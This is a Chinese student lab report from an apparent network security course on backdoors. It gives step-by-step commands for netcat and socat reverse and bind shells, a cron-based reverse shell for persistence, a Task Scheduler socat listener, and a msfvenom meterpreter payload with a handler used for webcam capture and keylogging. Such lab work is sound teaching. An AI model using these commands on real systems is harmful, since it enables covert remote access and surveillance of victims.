EXP2 后门原理与实践
实践内容
使用netcat和socat、msf-meterpreter等工具获得主机权限,并进行一些恶意行为,如监控摄像头、记录键盘输入、截屏等。
实验过程
windows获得linux shell
1、在windows中的命令提示符下用ipconfig指令找到主机ip
.
2、windows下使用C:UsersLenovoDesktop cat cat.exe -l -p 4331命令运行ncat.exe监听4331端口.
3、kali下使用为nc 172.30.1.85(主机ip) 4331 -e /bin/sh命令连接windows的4331端口.
4、没有反应表示连接成功,之后我们就可以在windows下获取kali的信息:
linux获得windows的shell
1、kali下使用nc -l -p 4331命令监听4331端口。
2、利用ifconfig在kali中找到kali的IP地址:192.168.116.128
3、在windows下使用C:UsersLenovoDesktop cat cat.exe -e cmd.exe 192.168.116.128(即kali的IP地址)连接kali的4331端口。
4、连接成功后,我们就可以在kali主机获取windows的信息,此时已成功获取windows的shell。
使用netcat传输数据
1、windows下使用C:UsersLenovoDesktop
cat
cat.exe -l -p 4331命令运行ncat.exe监听4331端口.
2、kali下使用为nc 172.30.1.85(主机ip) 4331命令连接windows的4331端口。
3、建立连接后,两边就可以进行传输。
Windows下:
虚拟机下:
cron启动
1、windows下使用C:UsersLenovoDesktop cat cat.exe -l -p 4331命令运行ncat.exe监听4331端口.
2、kali下使用crontab -e命令,设置一条定时指令,由于做的时候时间为19:13,所以我设置成在每小时的第17分钟反向连接windows主机的4331端口
输入指令 17* * * * /bin/netcat 172.30.1.85 4331 -e /bin/sh后按ctrl+x离开,并保存。
3、等到时间为17分钟的时候,在windows端用ls指令查看。
socat
socat获取主机操作Shell, 任务计划启动。
1、在windows下的控制面板--->管理工具--->任务计划程序中新建一个触发器,民称为20154331.
2、再新建一个操作,在操作->程序或脚本中选择你的socat.exe
文件的路径,在添加参数一栏填写tcp-listen:4331 exec:cmd.exe,pty,stderr,这个命令的作用是把cmd.exe
绑定到端口4331
,同时把cmd.exe
的stderr重定向到stdout上:
3、创建完成之后运行它。
4、然后在kali下使用指令socat - tcp:172.30.1.85(主机ip):4331(端口),这个时候就成功获取windows的shell。
msf-meterpreter
msf-meterpreter 生成后门,传输到靶机获取shell
1、在kali下输入命令:msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.116.128 LPORT=4331 -f exe > 20154331.exe
生成一个名为20154331的后门程序
2、使用netcat将这个后门程序传输到windows主机上。
首先我们在windows下输入ncat.exe -lv 4331 > 20154331.exe
随后在Linux下使用ncat -nv 172.30.1.85 4331 < 20154331.exe命令把文件传送过去
使用msf获取目标摄像头,进行录屏、键盘记录等操作
1、首先msf打开监听进程,msfconsole :进入msf
2、use exploit/multi/handler:进入handler模式
set payload windows/meterpreter/reverse_tcp :设置payload
set LHOST 192.168.116.128 :将LHOST设置为LinuxIP地址
set LPORT 4331 :设端口为那个4331exploit //MSF开始监听
3、获取windows系统的具体信息:
4、使用webcam_snap
指令可以使用摄像头进行拍照:
基础问题回答
(1)例举你能想到的一个后门进入到你系统中的可能方式?
答:将后门程序捆绑在可执行程序中,或者捆绑在某个软件里。
(2)例举你知道的后门如何启动起来(win及linux)的方式?
答:伪装成文件或常用软件,等待用户点击。
(3)Meterpreter有哪些给你映像深刻的功能?
答:可以打开摄像头和录音,挺可怕的。
(4)如何发现自己有系统有没有被安装后门?
答:查看电脑的开机项,检测是否有未知项,或者用杀毒软件扫。
实验心得:
这是网络攻防的第二次实验。能够利用后门查看他人电脑信息,获取他人摄像头权限进行录拍,还有录音。突然发现网络并不安全,我觉得我们还是要时刻警惕自己的电脑以防入侵。虽然我们只学了几节课,但是还是觉得网络攻防不是那么简单的,还有很多值得我们去学习。